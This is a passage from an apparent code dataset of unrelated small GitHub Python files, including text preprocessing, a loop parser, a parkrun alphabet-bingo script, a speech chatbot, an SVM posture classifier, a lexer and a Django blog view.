'partnerCode': partnerCode,\n 'accessKey': accessKey,\n 'requestId': requestId,\n 'amount': amount,\n 'orderId': orderId,\n 'orderInfo': orderInfo,\n 'returnUrl': returnUrl,\n 'notifyUrl': notifyurl,\n 'extraData': extraData,\n 'requestType': requestType,\n 'signature': signature\n }\n data = json.dumps(data)\n clen = len(data)\n req = urllib.request.Request(\n endpoint,\n data.encode('utf-8'),\n {'Content-Type': 'application/json', 'Content-Length': clen}\n )\n f = urllib.request.urlopen(req)\n response = f.read()\n f.close()\n return json.loads(response)\n\n\nif __name__ == \"__main__\":\n print(read_chuyenbay())","repo_name":"nhlonglegend/QuanLyBanVeMayBay","sub_path":"app/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70262347995","text":"from tqdm import tqdm\nimport re\nfrom textblob import Word\nimport numpy as np\n\n# Split at capitalize words and add underscore\ndef convert(name):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\ndef clean_trope(column):\n # Replace Longrunner with LongRunner\n column = column.str.replace('Longrunner', 'LongRunner', regex=False)\n # dataframe.loc[dataframe.Trope=='Longrunner', 'Trope'] = 'LongRunner'\n # Split at capitalize words and add underscore \n column = column.apply(lambda w: convert(w))\n # Convert plural to singular to get rid of duplicates\n column = column.apply(lambda w: Word(w).singularize())\n # dataframe = dataframe.reset_index(drop=True)\n return column\n\n# Decontract text\ndef decontracted(phrase):\n # specific\n phrase = re.sub(r\"won't\", \"will not\", str(phrase))\n phrase = re.sub(r\"can\\'t\", \"can not\", str(phrase))\n\n # general\n phrase = re.sub(r\"n\\'t\", \" not\", str(phrase))\n phrase = re.sub(r\"\\'re\", \" are\", str(phrase))\n phrase = re.sub(r\"\\'s\", \" is\", str(phrase))\n phrase = re.sub(r\"\\'d\", \" would\", str(phrase))\n phrase = re.sub(r\"\\'ll\", \" will\", str(phrase))\n phrase = re.sub(r\"\\'t\", \" not\", str(phrase))\n phrase = re.sub(r\"\\'ve\", \" have\", str(phrase))\n phrase = re.sub(r\"\\'m\", \" am\", str(phrase))\n return phrase\n\n# Preprocess text\ndef preprocess(text_column):\n my_list = []\n # tqdm is for printing the status bar\n for sentance in tqdm(text_column.values):\n sent = decontracted(sentance)\n sent = sent.replace('\\\\r', ' ')\n sent = sent.replace('\\\\\"', ' ')\n sent = sent.replace('\\\\n', ' ')\n sent = re.sub('[^A-Za-z0-9]+', ' ', sent)\n # https://gist.github.com/sebleier/554280\n sent = ' '.join(e.lower() for e in sent.split())\n my_list.append(sent.lower().strip())\n \n return my_list","repo_name":"chav-ngvyen/NLP_tvtropes","sub_path":"codes/preprocess_functions.py","file_name":"preprocess_functions.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40615862032","text":"import re\nimport sys\n\nVARS = []\n\nkeywords = [\"if\", \"endif\", \"for\", \"endfor\", \"and\", \"or\", \"max\", \"min\", \"else\", \"MAX\", \"MIN\"]\n\n# przetwarza petle\ndef Loop(loop, extra_ub = 0):\n\n step = 0\n pattern = re.compile(\"\\W*for\\W*\\(\")\n if pattern.match(loop):\n line = pattern.sub(\"\", loop)\n test = re.compile(\";\").split(line)\n z1 = re.compile(\"=.*\")\n var = z1.sub(\"\",test[0])\n var = var.replace(\" \", \"\")\n z1 = re.compile(\".*=\")\n lb = z1.sub(\"\",test[0])\n\n ub = \"\"\n z1 = re.compile(\".*<=\")\n if(z1.match(test[1])):\n ub = z1.sub(\"\",test[1])\n else:\n z1 = re.compile(\".*<\")\n if(z1.match(test[1])):\n ub = z1.sub(\"\",test[1]) + \"-1\"\n\n if ub == \"\":\n z1 = re.compile(\".*>=\")\n if(z1.match(test[1])):\n ub = z1.sub(\"\",test[1])\n else:\n z1 = re.compile(\".*>\")\n if(z1.match(test[1])):\n ub = z1.sub(\"\",test[1]) + \"+1\"\n\n if(extra_ub != 0):\n ub = ub + \" + \" + str(extra_ub)\n\n if (extra_ub != 0):\n lb = lb + \" - \" + str(extra_ub)\n\n\n # przerobic na inne zmiany zmiennej indeksowej += -=\n\n z1 = re.compile(\".*\\+\\+\")\n \n if z1.match(test[2]):\n step = 1\n\n z1 = re.compile(\".*\\-\\-\")\n if z1.match(test[2]):\n step = -1\n \n _z = test[2]\n _z = _z.replace(\")\", \"\") \n \n if \"+=\" in _z:\n _z = _z.replace(\"+=\", \"\")\n _z = _z.replace(var, \"\")\n step = _z\n \n if \"-=\" in _z:\n _z = _z.replace(\"-=\", \"\")\n _z = _z.replace(var, \"\")\n step = \"-\" +_z\n\n\n\n new_loop = \"for \" + var + \" = \" + lb + \" to \" + ub;\n\n\n #new_loop += \"endfor\"\n if step != 1:\n new_loop = new_loop + ' by ' + str(step).replace(\"{\", \"\")\n\n\n\n \n new_loop = new_loop + \" do\";\n \n \n stuff = { 'lb' : lb, 'ub' : ub, \"var\" : var, \"step\" : step, \"new_loop\" : new_loop }\n\n\n return stuff\n \n return 0\n\ndef If_Statement(line):\n tmp = line\n pattern = re.compile(\"\\W*if\\W*\\(\")\n if pattern.match(line) or 'else' in line:\n tmp= tmp.replace(\"{\", \"\")\n tmp= tmp.replace(\"}\", \"\")\n tmp= tmp.replace(\"&&\", \" and \")\n tmp= tmp.replace(\"||\", \" or \")\n if 'if' in line:\n tmp = tmp + \" then\"\n return tmp\n else:\n return \"\"\n \n \n#szuka zmiennych\ndef CollectVars(varsn, loop1):\n op = \"[_A-Za-z_][_A-Za-z_\\d']*\"\n new_vars = re.findall(op, loop1)\n for zvar in new_vars:\n if not zvar in keywords:\n VARS.append([zvar, DimVar(zvar, loop1)])\n resulting_list = list(varsn)\n resulting_list.extend(x for x in new_vars if x not in resulting_list)\n return resulting_list \n\ndef CollectVars_O(content, varsn, pvarsn):\n op = \"\\W*for\\W*\\(\\W*[_A-Za-z_][_A-Za-z_\\d']*\"\n for line in content:\n if(re.match(op, line)):\n varx = re.findall(op, line)\n varx = re.compile(\"\\W*for\\W*\\(\\W*\").sub(\"\", varx[0])\n if varx not in varsn:\n varsn.append(varx)\n pvarsn.append(varx)\n return varsn #[varsn, pvarsn] potem\n \n# pobiera wymiar zmiennej z lini\ndef DimVar(var, line):\n # dim = var + \"\\W*\\[[^(\\=|\\<|\\>|\\+|\\-|\\*|\\/|;)]*\"\n line = line.replace(\"][\", \",\")\n \n dim = var + \"\\[[^\\]]*\"\n z = re.findall(dim, line)\n\n if len(z) == 0:\n return 0;\n dim_var = z[0].count(',')+1 \n return dim_var\n\n#pobiera wymiar zmiennej z tablicy (po wczytaniu)\ndef _DIM(var):\n for item in VARS:\n if(item[0] == var):\n return item[1]\n \n# Definitions\ndef MakeDef(var, dim):\n defv = \"integer \" + var;\n if dim > 0:\n defv += \"(\"; \n for i in range(1, dim+1):\n defv += \"0:9999,\" \n \n defv = re.compile(\",$\").sub(\")\", defv); \n return defv\n\n#przeksztalca funkcje\ndef ConvertSt(st):\n\n\n st = re.compile(\"\\]\\W*\\[\").sub(\",\", st)\n st = re.compile(\"\\[\").sub(\"(\", st)\n st = re.compile(\"\\]\").sub(\")\", st)\n st = st.replace(\";\", \"\")\n st = st.replace(\"%\", \" mod \")\n\n\n\n return st\n","repo_name":"lshadown/traco","sub_path":"py/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5331882466","text":"n = int(input())\n\nnew_list = []\n\nsearch_no = True\n\nfor i in range(n):\n nn = input()\n new_list.append(nn)\n\nk = int(input())\n\nfor x in range(k):\n word = input()\n\n fin_list = []\n for line in new_list:\n if word.lower() in line.lower():\n search_no = False\n fin_list.append(line)\n\nprint(*fin_list, sep='\\n')","repo_name":"Dinuliat/stepik_python1","sub_path":"xxx.py","file_name":"xxx.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"41314347466","text":"import pandas as pd\n\"\"\"\nINTRODUCTION\n\n\n#Example data in array format: \na=([\n ['Bushy', '09/02/2022', '201', '24', '18:01', '75.21%', 'PB'],\n ['Worcester', '25/03/2022', '360', '13', '17:38', '76.84%', ''],\n ['Alvaston', '18/04/2022', '86','17', '16:55', '80.10%', 'PB'],\n ['Markeaton','04/04/2022','358','25','17:21','78.10%', '']\n ])\n\ndf = pd.DataFrame(a)\n\n\nExample output:\n\n4 events attended: Alvaston, Bushy, Markeaton, Worcester\n \n4 letters completed: B, A, M, W\n \n22 letters needed: C, D, E, F, G, H, I, J, K, L, N, O, P, Q, R, S, T, U, V, X, Y, Z\n\n\"\"\"\n\n\n\"\"\"\nMAIN CODE \n\"\"\"\n# make dataframe from All Events table (copied to clipboard)\ndf = pd.read_clipboard()\n\n#add column headings\ndf.columns=[\"Event\",\"Run Date\",\"Run Number\",\"Pos\",\"Time\",\"Age Grade\",\"PB\"]\n\n#initiate lists of letters completed and needed \nletters_completed=[]\nletters_needed=[]\n\n#append first letter of each event done to completed letters list\nfor event in df['Event']:\n letters_completed.append(event[0])\n \nletters_completed =(list(set(letters_completed)))\nletters_completed.sort()\n\n\n#iterate through alphabet to append letters missing from completed list to needed list\n \nalphabet=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\nfor letter in alphabet:\n if letter not in letters_completed:\n letters_needed.append(letter)\n \n#print list of events attended in alphabetical order\nevents_attended= df['Event'].unique()\nevents_attended.sort()\nprint(len(events_attended),\"events attended: \",\", \".join(events_attended))\nprint(\" \")\n\n#print comma separated string of letters completed starting with total number of \nprint(len(letters_completed),\"letters completed: \", \", \".join(letters_completed))\nprint(\" \")\n\n#print comma separated string of letters needed starting with total number of \nprint(len(letters_needed),\"letters needed: \", \", \".join(letters_needed))\n\n\n\n","repo_name":"martin-kerr/parkrun-5k-challenges","sub_path":"alphabet-bingo.py","file_name":"alphabet-bingo.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10087130080","text":"from services.productos import Productos\n\n\nclass Mascotas(Productos):\n def __init__(self, nombre, tipo, precio, categoria, especie, edad, raza, mantenimiento):\n super().__init__(nombre, tipo, precio)\n self.categoria = categoria\n self.especie = especie\n self.edad = edad\n self.raza = raza\n self.mantenimiento = mantenimiento\n\n def __del__(self):\n pass\n\n @staticmethod\n def mostrar_datos(producto):\n Productos.mostrar_datos(producto)\n print(\"SECCION: \" + producto['categoria'] + \"\\nESPECIE:\" + producto['especie'] + \"\\nEDAD: \" + producto['edad'] + \"\\nMARCA: \" + producto['marca'] + \"\\nCUIDADOS ESPECIALES: \" + producto['mantenimiento'])\n\n def push(self, array):\n nuevo_producto = {\n 'id': self.id,\n 'nombre': self.nombre,\n 'tipo': self.tipo,\n 'precio': self.precio,\n 'categoria': self.categoria,\n 'especie': self.especie,\n 'edad': self.edad,\n 'raza': self.raza,\n 'mantenimiento': self.mantenimiento,\n }\n array.append(nuevo_producto)\n","repo_name":"InakiGT/uamart","sub_path":"services/mascotas.py","file_name":"mascotas.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"23939680470","text":"a=[2, 1, 3, 5, 3, 2]\n\ndef firstDuplicate(a):\n lista=[]\n yatengo=[]\n for i in range(len(a)):\n if a[i] in yatengo :\n lista.append(a[i])\n\n yatengo.append(a[i])\n \n for l in lista:\n print(l)\n \n if lista == []:\n return -1\n else:\n return(lista[0])\n\nfirstDuplicate(a)","repo_name":"ivanFlor3s/first-python-scripts","sub_path":"Dumb-scripts/first-rep.py","file_name":"first-rep.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5506912807","text":"import pyttsx3\nimport speech_recognition as sr\nimport winsound\nimport time\n\ntalk = pyttsx3.init()\n# Set properties _before_ you add things to say\ntalk.setProperty('rate', 150) # Speed percent (can go over 100)\ntalk.setProperty('volume', 0.9) # Volume 0-1\n\n#possible lists of possible words or sentences with different punctuation\nhi_List = ['hi', 'Hi', 'Hello', 'hello', 'Hey', 'hey', 'yo', 'Yo,' 'salam', 'Salam', 'hi totla', 'Hi totla', 'totla', 'Totla']\nbye_List = ['Bye', 'bye', 'Goodbye', 'goodbye', 'Good bye' 'good bye', 'byebye', 'by by', 'By by', 'Tata', 'tata', 'So long', 'so long', 'okay bye', 'ok bye', 'Ok bye', 'Okay bye']\nqst1_list = [\"Who are you\", 'who are you', 'whats your name', 'your name', 'Your name', 'What are you', 'what are you']\nres_neg_list = ['bad robot', 'Bad robot','bad boy', \"Bad boy\", 'you are rude totla', 'You are rude totla', 'you are a bad robot', 'You are a bad robot']\nLove_list = ['i love you', 'I love you', 'Love you', 'love you']\nhate_list = ['i hate you', 'I hate you', 'Hate you', 'hate you']\nfriend_list = ['do you know who is my girl friend', 'do you know what is my girl friend name']\nname_list =['do you know', 'who i am','do you know me', 'do you know what is my name']\n\ndef Listen():\n \"\"\"\n Takes users voice as input and converts it to text.\n \"\"\"\n speech = sr.Recognizer()\n #say beep before listening\n \n #take input from microphone\n with sr.Microphone() as source:\n winsound.Beep(frequency = 2500, duration = 100) #beep to inform that it's listening\n print(\"Say>>\")\n voice = speech.listen(source) \n text = speech.recognize_google(voice)\n print(text) #print what it heard just to debug\n\n return text #return what was heard\n\n \ndef Decide(listen):\n \"\"\"\n Takes decision based on what user says.\n \"\"\"\n print(f\" Command = {listen}.\") #just to debug\n\n #see what user said is in which list or not\n if listen in hi_List:\n print(\"Resonse in Hi list\")\n Respond(\"Hi there, Good to see you. Assalamualaikum\")\n\n elif listen in bye_List:\n print(\"In bye list.\")\n Respond(\"I liked talking with you, okay take care.\")\n\n elif listen in Love_list:\n Respond(\"Yuk, I have a robot girl friend. No seat available\")\n \n elif listen in hate_list:\n Respond(\"I Hate you too.\")\n \n elif listen in qst1_list:\n Respond(\"\"\"I am Totla Robot. The dumb talking robot written in python.\n My creator Md Rayef Enam is trying to make me smart\"\"\")\n \n elif listen in res_neg_list:\n Respond(\"I am very sorry I was just joking.\")\n \n elif listen in friend_list:\n Respond(\"Your girl friend name is Taspiya Jaha Joya and she live in Norway at Oslo city\")\n \n elif listen in name_list:\n Respond(\"Your name is Md Rayef Enam and you are studying in Computer Science and Engineering at BGC Trust University Bangladesh\")\n\n else:\n Respond(\"Sorry I don't understand Please say again.\")\n\ndef Respond(t):\n print(f\"Talking the: {t}\") #to debug and see if everythings going okay\n\n talk.say(t)\n talk.setProperty('rate', 90) #90 words per minute\n talk.runAndWait()\n\nwhile True: #for ever loop \n\n comm = Listen() #listen to what user says\n\n Decide(comm) #take decision and respond\n\n time.sleep(1)\n","repo_name":"MDRAYEFENAM/NLP","sub_path":"TalkingBot.py","file_name":"TalkingBot.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"2369528113","text":"string_size = int(input())\nstring = list(input())\nscore = 0\ni = 0\n\nwhile i in range(len(string)):\n c = string[i]\n if c == \"V\":\n score += 5\n elif c == \"W\":\n score += 2\n elif c == \"X\":\n i += 1\n elif c == \"Y\":\n if i != len(string) - 1:\n string.append(string[i+1])\n i += 1\n elif c == \"Z\":\n if i != len(string) - 1:\n if string[i+1] == \"V\":\n score = int(score / 5)\n i += 1\n elif string[i+1] == \"W\":\n score = int(score / 2)\n i += 1\n i += 1\n\nprint(score)\n","repo_name":"OmarAlSeddik/competitive-programming-codeforces","sub_path":"Assiut Sheets Python/sheet4/string_score.py","file_name":"string_score.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"32320668601","text":"'''Query module\n'''\nfrom .db import TEDB, TEDBColumn, TEDBQuery, SortOrder\n\ndef query(database, select=None, distinct=False, where=None, order_by=None, order=None, limit=None, offset=None):\n '''Perform a query on the database\n '''\n with TEDB(database) as tedb:\n if select:\n select = [TEDBColumn(col) for col in select]\n if TEDBColumn.ALL in select and len(select) > 1:\n raise ValueError(\n \"Cannot specify column '*' with other columns\"\n )\n if order_by:\n order_by = [TEDBColumn(col) for col in order_by]\n if TEDBColumn.ALL in order_by:\n raise ValueError(\"order_by cannot contain '*' column\")\n if order:\n order = SortOrder(order)\n query = TEDBQuery(\n select, distinct, where, order_by, order, limit, offset\n )\n if len(select) == 1 and select[0] == TEDBColumn.ALL:\n yield [col.name for col in TEDB.ORDERED_COLUMNS]\n else:\n yield [col.name for col in select]\n yield from tedb.select(query)\n","repo_name":"koromodako/timeline_explorer","sub_path":"timeline_explorer/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"37351234990","text":"# CP template Version 1.006\nimport os\nimport sys\n#import string\n#from functools import cmp_to_key, reduce, partial\n#import itertools\n#from itertools import product\n#import collections\n#from collections import deque\n#from collections import Counter, defaultdict as dd\n#import math\n#from math import log, log2, ceil, floor, gcd, sqrt\n#from heapq import heappush, heappop\n#import bisect\n#from bisect import bisect_left as bl\nDEBUG = False\n\ndef main(f=None):\n init(f)\n # sys.setrecursionlimit(10**9)\n # ######## INPUT AREA BEGIN ##########\n\n def rotate(arr):\n for cur, nxt in arr:\n brd[cur] = brd[nxt]\n brd[nxt] = 0\n\n R, C, T = map(int,input().split())\n L = C+1\n brd = [-1] * (R+1)*L\n dir = (1, -1, L, -L)\n for r in range(0, R*L, L):\n brd[r:r+C] = map(int,input().split())\n \n for r in range(0, R*L, L):\n if brd[r] == -1:\n puu, pud = r, r+L\n break\n \n rtu = list(range(puu-L, 0, -L)) + list(range(0, L-2)) + list(range(L-2, puu, L)) + list(range(pud-2, puu, -1))\n rtu = list(zip(rtu, rtu[1:]))\n rtd = list(range(pud+L, R*L-L, L)) + list(range(R*L-L, R*L-2)) + list(range(R*L-2, pud+L, -L)) + list(range(pud+L-2, pud, -1)) \n rtd = list(zip(rtd, rtd[1:]))\n\n for _ in range(T):\n\n dif = [0] * R*L\n\n for c in range(0, R*L, L):\n for cur in range(c, c+C):\n if brd[cur] > 4:\n mov = brd[cur]//5\n for d in dir:\n if brd[cur+d] != -1:\n dif[cur] -= mov\n dif[cur+d] += mov\n\n for c in range(0, R*L, L):\n for cur in range(c, c+C):\n brd[cur] += dif[cur]\n\n rotate(rtu)\n rotate(rtd)\n\n print(sum(brd)+R+L+2)\n \n # ######## INPUT AREA END ############\n\n\n# TEMPLATE ###############################\n\n\nenu = enumerate\n\n\ndef For(*args):\n return itertools.product(*map(range, args))\n\n\ndef Mat(h, w, default=None):\n return [[default for _ in range(w)] for _ in range(h)]\n\n\ndef nDim(*args, default=None):\n if len(args) == 1:\n return [default for _ in range(args[0])]\n else:\n return [nDim(*args[1:], default=default) for _ in range(args[0])]\n\n\ndef setStdin(f):\n global DEBUG, input\n DEBUG = True\n sys.stdin = open(f)\n input = sys.stdin.readline\n\n\ndef init(f=None):\n global input\n input = sys.stdin.readline # io.BytesIO(os.read(0, os.fstat(0).st_size)).readline\n if os.path.exists(\"o\"):\n sys.stdout = open(\"o\", \"w\")\n if f is not None:\n setStdin(f)\n else:\n if len(sys.argv) == 1:\n if os.path.isfile(\"in/i\"):\n setStdin(\"in/i\")\n elif os.path.isfile(\"i\"):\n setStdin(\"i\")\n elif len(sys.argv) == 2:\n setStdin(sys.argv[1])\n else:\n assert False, \"Too many sys.argv: %d\" % len(sys.argv)\n\n\ndef pr(*args):\n if DEBUG:\n print(*args)\n\n\ndef pfast(*args, end=\"\\n\", sep=' '):\n sys.stdout.write(sep.join(map(str, args)) + end)\n\n\ndef parr(arr):\n for i in arr:\n print(i)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"TaemHam/Baekjoon_Submission","sub_path":"17144 미세먼지 안녕/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"17528207964","text":"\nfrom django.shortcuts import render, get_object_or_404\nfrom .models import Tag, Article\nfrom .models import Contact\nfrom django.http import HttpResponse\nfrom django.db.models import Q\n\ndef home(request):\n\n # feature articles on the home page\n featured = Article.articlemanager.filter(featured=True)[0:6]\n\n context = {\n 'articles': featured\n }\n\n return render(request, 'index.html', context)\n\n\ndef articles(request):\n\n # get query from request\n query = request.GET.get('query')\n # print(query)\n # Set query to '' if None\n if query == None:\n query = ''\n\n # articles = Article.articlemanager.all()\n # search for query in headline, sub headline, body\n articles = Article.articlemanager.filter(\n Q(headline__icontains=query) |\n Q(sub_headline__icontains=query) |\n Q(body__icontains=query)\n )\n\n Tags = Tag.objects.all()\n\n context = {\n 'articles': articles,\n }\n\n return render(request, 'articles.html', context)\n\n\ndef article(request, article):\n\n article = get_object_or_404(Article, slug=article, status='published')\n\n context = {\n 'article': article\n }\n\n return render(request, 'article.html', context)\n\ndef about(request):\n return render(request, 'about.html') \n\ndef contact(request):\n if request.method==\"POST\":\n contact=Contact()\n name=request.POST.get('name')\n email=request.POST.get('email')\n mobileno=request.POST.get('mobileno')\n message=request.POST.get('message')\n contact.name=name\n contact.email=email\n contact.mobileno=mobileno\n contact.message=message\n contact.save()\n return HttpResponse(\"<h1>THANKS FOR CONTACT US</h1>\")\n return render(request, 'contact.html')\n\n\n","repo_name":"ravi7380/AHR-BLOGS.github.io","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"16456867039","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*- \n# Author: qjk\n\nimport collections\nclass Solution(object):\n def findPairs(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n result = 0\n c = collections.Counter(nums)\n for i in c:\n if k > 0 and i + k in c or k == 0 and c[i] > 1:\n result += 1\n return result\n\nif __name__ == '__main__':\n print(Solution().findPairs([1, 3, 1, 5, 4, 4], 0))","repo_name":"Roc-J/LeetCode","sub_path":"500~599/problem532.py","file_name":"problem532.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"71232354076","text":"import logging\nimport shutil\n\nfrom giza.libgiza.task import Task\n\nfrom giza.content.steps.inheritance import StepDataCache\nfrom giza.content.steps.views import render_steps\nfrom giza.config.content import new_content_type\n\nlogger = logging.getLogger('giza.content.steps.tasks')\n\n\ndef register_steps(conf):\n content_dfn = new_content_type(name='steps',\n task_generator=step_tasks,\n conf=conf)\n\n conf.system.content.add(name='steps', definition=content_dfn)\n\n\ndef write_steps(steps, fn, conf):\n content = render_steps(steps, conf)\n content.write(fn)\n logger.debug('wrote steps to: ' + fn)\n\n\ndef step_tasks(conf):\n s = StepDataCache(conf.system.content.steps.sources, conf)\n s.create_output_dir()\n\n tasks = []\n for fn, stepf in s.file_iter():\n t = Task(job=write_steps,\n args=(stepf, stepf.target(fn), conf),\n description='generate a stepfile for ' + fn,\n target=stepf.target(fn),\n dependency=fn)\n tasks.append(t)\n\n logger.debug('added tasks for {0} step generation tasks'.format(len(tasks)))\n return tasks\n\n\ndef step_clean(conf):\n return [Task(job=shutil.rmtree,\n args=[conf.system.content.steps.output_dir],\n target=True,\n dependency=[conf.system.content.steps.output_dir],\n description='removing {0}'.format(conf.system.content.steps.output_dir))]\n","repo_name":"mongodb/docs-tools","sub_path":"giza/giza/content/steps/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"50"} +{"seq_id":"8854988993","text":"import json\nimport numpy as np\nimport sys\nimport os\nimport matplotlib.pyplot as plt \nfrom sklearn.datasets import make_classification\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\n\n\n\n#outlier detection \n#classification\n\nclass PoseClassifier():\n\n def __init__(self, features, targets, class_names):\n self.X_train, self.X_test, self.y_train, self.y_test = \\\n train_test_split(features, targets, random_state=0)\n self.class_names = class_names\n\n def classifySVN(self):\n print('SVN classifier initialization')\n classifier = SVC(kernel='linear', C=0.001, gamma='scale', verbose=True).fit(self.X_train, self.y_train)\n np.set_printoptions(precision=2)\n titles_options = [(\"Confusion matrix, without normalization\", None),\n (\"Normalized confusion matrix\", 'true')]\n print('confusion_matrix building')\n print(classifier.score(self.X_test, self.y_test))\n for title, normalize in titles_options:\n disp = plot_confusion_matrix(classifier, self.X_test, self.y_test,\n display_labels=self.class_names,\n cmap=plt.cm.Blues,\n normalize=normalize)\n disp.ax_.set_title(title)\n\n print(title)\n print(disp.confusion_matrix)\n\n plt.show()\n def classifyKnn(self):\n print('SVN classifier initialization')\n classifier = KNeighborsClassifier(n_neighbors=3, verbose=True).fit(self.X_train, self.y_train)\n np.set_printoptions(precision=2)\n titles_options = [(\"Confusion matrix, without normalization\", None),\n (\"Normalized confusion matrix\", 'true')]\n print('confusion_matrix building')\n print(classifier.score(self.X_test, self.y_test))\n for title, normalize in titles_options:\n disp = plot_confusion_matrix(classifier, self.X_test, self.y_test,\n display_labels=self.class_names,\n cmap=plt.cm.Blues,\n normalize=normalize)\n disp.ax_.set_title(title)\n\n print(title)\n print(disp.confusion_matrix)\n \n \n def plot_conf_mat(self):\n pass\n","repo_name":"IvannaKramer/poor_neck_posture_dataset","sub_path":"src/posture_classifier.py","file_name":"posture_classifier.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"12092247891","text":"from __future__ import annotations\nfrom enum import Enum\n\n\nclass TokenType(Enum):\n \"\"\"Enum representing all token types.\"\"\"\n EOF = 0\n SEMICOLON = 1\n EQUALS = 2\n LBRACE = 3\n RBRACE = 4\n ARROW = 5\n LPAREN = 6\n RPAREN = 7\n QUOTE = 8\n COMMA = 9\n PROPERTY = 10\n NUMBER = 11\n ID = 12\n\n\nclass Token:\n \"\"\"Token abstraction.\"\"\"\n\n def __init__(self, token_type: int, text: str) -> None:\n \"\"\"Constructor.\n Args:\n token_type (TokenType): A numeric token type representation.\n text (str): A lexeme\n \"\"\"\n self.token_type = token_type\n self.text = text\n\n def __str__(self) -> str:\n return f\"{self.text}, {TokenType(self.token_type).name}\"\n\n def __hash__(self):\n return hash((self.token_type, self.text))\n\n def __eq__(self, other: Token) -> bool:\n return (\n self.token_type == other.token_type,\n self.text == other.text\n )\n\n\nclass Lexer:\n \"\"\"Lexer for the parser module.\"\"\"\n\n def __init__(self, input_stream: str) -> None:\n \"\"\"Constructor.\n Args:\n input_stream (str): String input to be lexified.\n \"\"\"\n self.input_stream = input_stream\n self.pos: int = 0\n self.line_num: int = 1\n self.char_num: int = 1\n\n if len(input_stream) != 0:\n self.char = self.input_stream[self.pos]\n else:\n self.char = TokenType.EOF\n\n def next_token(self) -> Token:\n \"\"\"Return the next token from the input stream, ignoring whitespace.\"\"\"\n while self.char != TokenType.EOF:\n\n if self.char in [' ', '\\t', '\\n', '\\r']:\n self.consume()\n\n elif self.char in ['\\'', '\\\"']:\n self.consume()\n return Token(TokenType.QUOTE, '\"')\n\n elif self.char == ';':\n self.consume()\n return Token(TokenType.SEMICOLON, ';')\n\n elif self.char == ',':\n self.consume()\n return Token(TokenType.COMMA, ',')\n\n elif self.char == '{':\n self.consume()\n return Token(TokenType.LBRACE, '{')\n\n elif self.char == '}':\n self.consume()\n return Token(TokenType.RBRACE, '}')\n\n elif self.char == '(':\n self.consume()\n return Token(TokenType.LPAREN, '(')\n\n elif self.char == ')':\n self.consume()\n return Token(TokenType.RPAREN, ')')\n\n elif self.char == '-':\n self.consume()\n if self.char == '>':\n self.consume()\n return Token(TokenType.ARROW, '->')\n else:\n self.error()\n\n elif self.char == '=':\n self.consume()\n return Token(TokenType.EQUALS, '=')\n\n elif self.char == '#':\n lexeme = \"\"\n while self.char != TokenType.EOF and self.char != '\\n':\n self.consume()\n\n elif self.char.isdigit():\n lexeme = \"\"\n while self.char != TokenType.EOF and self.char.isdigit():\n lexeme += self.char\n self.consume()\n return Token(TokenType.NUMBER, lexeme)\n\n elif self.char.isalpha():\n lexeme = \"\"\n while (self.char != TokenType.EOF and\n (self.char.isalpha() or\n self.char.isdigit() or\n self.char == '_')):\n lexeme += self.char\n self.consume()\n return Token(TokenType.ID, lexeme)\n else:\n self.error()\n\n return Token(TokenType.EOF, \"<EOF>\")\n\n def consume(self) -> None:\n \"\"\"Advance to the next character in the input stream, or EOF.\"\"\"\n if self.char in ['\\n', '\\r']:\n self.line_num += 1\n self.char_num += 1\n else:\n self.char_num += 1\n\n self.pos += 1\n if self.pos >= len(self.input_stream):\n self.char = TokenType.EOF\n else:\n self.char = self.input_stream[self.pos]\n\n def error(self) -> None:\n raise SyntaxError(f\"Invalid character {self.char} at \"\n f\"[{self.line_num}:{self.char_num}]\")\n","repo_name":"krummja/Apparata","sub_path":"apparata/parser/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6580432512","text":"from LJ.application.Modules.Particle import Particle\nfrom 